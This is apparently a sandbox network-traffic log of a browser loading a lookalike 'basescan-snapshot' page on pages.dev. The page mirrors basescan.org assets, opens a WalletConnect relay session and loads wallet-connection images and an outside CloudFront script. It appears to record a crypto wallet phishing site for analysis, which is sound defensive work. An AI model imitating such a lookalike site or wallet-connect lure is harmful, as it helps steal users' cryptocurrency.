            Source: global trafficHTTP traffic detected: GET /assets/vendor/font-awesome/webfonts/fa-regular-400.woff2 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/font-awesome/webfonts/fa-light-300.woff2 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/font-awesome/webfonts/fa-brands-400.woff2 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jss/blockies.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jss/qrcode.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/jquery/dist/jquery.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/jquery-migrate/dist/jquery-migrate.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/popper.js/dist/umd/popper.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /?auth=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaWQ6a2V5Ono2TWtqZkVuWFNaR2RzR1l3QTN5dmVkUnRRZnpBZ1NEODVjVjRLUHBVNXhqeTcyRSIsInN1YiI6ImEzMjNmZGIwNjcxN2NkZDQ5NWY1MTk0YWJhMmQ1MWE5MTgzN2YyMGVmNzcxYzU4YjczZjZlNGY5MTc5N2Q5NDUiLCJhdWQiOiJ3c3M6Ly9yZWxheS53YWxsZXRjb25uZWN0Lm9yZyIsImlhdCI6MTcyNzQ4NjE2MywiZXhwIjoxNzI3NTcyNTYzfQ.2IWsPgcbMuIAni5_gbMYD5pXX-WzvGHhTKC-ylw8b33VlwvEvd8QPOwVO4Nu0f-VxqWh34Oo3yeGn9wSJ6hoCA&projectId=9a504add1206ecb902aee52264862b81&ua=wc-2%2Fjs-2.10.2%2Fwindows10-chrome-117.0.0%2Fbrowser%3Abasescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev&useOnCloseEvent=true HTTP/1.1Host: relay.walletconnect.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: yNOx0tgGiC5zUoFzamZddw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /public/getAssetImage/0c2840c3-5b04-4c44-9661-fbd4b49e1800 HTTP/1.1Host: api.web3modal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-sdk-version: html-ethers5-3.2.1x-sdk-type: w3msec-ch-ua-mobile: ?0x-project-id: 9a504add1206ecb902aee52264862b81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/bootstrap/bootstrap.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /public/getAssetImage/692ed6ba-e569-459a-556a-776476829e00 HTTP/1.1Host: api.web3modal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-sdk-version: html-ethers5-3.2.1x-sdk-type: w3msec-ch-ua-mobile: ?0x-project-id: 9a504add1206ecb902aee52264862b81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/hs-megamenu/src/hs.megamenu.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/malihu-custom-scrollbar-plugin/jquery.mCustomScrollbar.concat.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /public/getAssetImage/ef1a1fcf-7fe8-4d69-bd6d-fda1345b4400 HTTP/1.1Host: api.web3modal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-sdk-version: html-ethers5-3.2.1x-sdk-type: w3msec-ch-ua-mobile: ?0x-project-id: 9a504add1206ecb902aee52264862b81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/cubeportfolio/js/jquery.cubeportfolio.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/hs.core.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/components/hs.header.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/jquery-mousewheel/3.1.13/jquery.mousewheel.min.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/dist/websiteAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /images/svg/brands/walletconnect.svg HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/dist/websiteAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /images/logo-ether.svg?v=0.0.7 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/logo-symbol.svg HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/main/empty-token.png HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/font-awesome/webfonts/fa-regular-400.woff HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/gen/cexio_20.png HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /public/getAssetImage/93564157-2e8e-4ce7-81df-b264dbee9b00 HTTP/1.1Host: api.web3modal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/font-awesome/webfonts/fa-solid-900.woff HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/gen/cons_20.png HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/font-awesome/webfonts/fa-light-300.woff HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/font-awesome/webfonts/fa-brands-400.woff HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/components/hs.unfold.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/components/hs.malihu-scrollbar.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /up/script_asset/710c81a103.js HTTP/1.1Host: d107ul3j3wrui0.cloudfront.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/svg/brands/metamask.svg HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /getWalletImage/7677b54f-3486-46e2-4e37-bf8747814f00 HTTP/1.1Host: api.web3modal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-sdk-version: html-ethers5-3.2.1x-sdk-type: w3msec-ch-ua-mobile: ?0x-project-id: 9a504add1206ecb902aee52264862b81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /getWalletImage/018b2d52-10e9-4158-1fde-a5d5bac5aa00 HTTP/1.1Host: api.web3modal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-sdk-version: html-ethers5-3.2.1x-sdk-type: w3msec-ch-ua-mobile: ?0x-project-id: 9a504add1206ecb902aee52264862b81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/font-awesome/webfonts/fa-regular-400.ttf HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/components/hs.focus-state.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
